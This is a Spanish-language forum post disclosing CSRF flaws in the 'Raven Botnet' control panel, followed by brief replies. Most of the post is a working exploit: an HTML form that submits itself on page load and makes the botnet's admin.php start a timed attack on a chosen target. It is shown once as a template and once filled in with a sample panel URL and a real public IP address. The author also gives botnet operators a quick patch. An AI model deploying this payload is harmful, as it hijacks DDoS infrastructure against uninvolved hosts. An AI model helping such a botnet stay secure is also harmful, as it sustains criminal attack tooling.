Bueno pues hola a todos, he encontrado varios CSRF en la Raven Botnet, uno de ellos está en la parte del ataque:
<html>
<!-- CSRF Raven botnet, by Metadato -->
<body onload="document.csrf.submit();">
<form name="csrf" action="URL DONDE SE ENCUENTRA LA BOTNET/admin.php" method="post">
<input type="hidden" name="target" value="HOST / IP QUE QUEREMOS ATACAR">
<input type="hidden" name="time" value="TIEMPO EN SEGUNDOS">
<input type="hidden" name="start" value="Attack!">
</form>
</body>
</html>
Tendrían que editar todo lo que está en mayúscula, les mostraré el mismo código con un ejemplo:
<html>
<!-- CSRF Raven botnet, by Metadato -->
<body onload="document.csrf.submit();">
<form name="csrf" action="http://ravenbotnet.com/admin.php" method="post">
<input type="hidden" name="target" value="173.194.34.248">
<input type="hidden" name="time" value="500">
<input type="hidden" name="start" value="Attack!">
</form>
</body>
</html>
Tambien podrían ocultar este script con un pequeño fake, pero como la intención de este post es que se fixeen los CSRF's, no se lo mostraré.
Bueno tambien voy a ser sincero, ¿cuantos de ustedes muestran la url donde esta su Raven Botnet? Creo que ninguno, quien lo haga no es muy recomendable, y más en este caso.
Bueno si quieren solucionar esto de forma rápida (aunque algo chapucera), puede cambiar el nombre de admin.php por otro nombre y en el index.php, en la línea 10:
echo '<META HTTP-EQUIV="Refresh" CONTENT="0; URL=admin.php">';
Le cambian el admin.php por el nombre que le pusieron y listo, también pueden montar la Raven de forma local. Espero que [Q]3rV[0] atienda este mensaje.
Un saludo ;D
Muy buen csrf, y el detalle de reportarlo muchisimo mejor.
Saludos!
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Muy buen csrf, y el detalle de reportarlo muchisimo mejor.
Saludos!
Gracias Pekador, un saludo compa.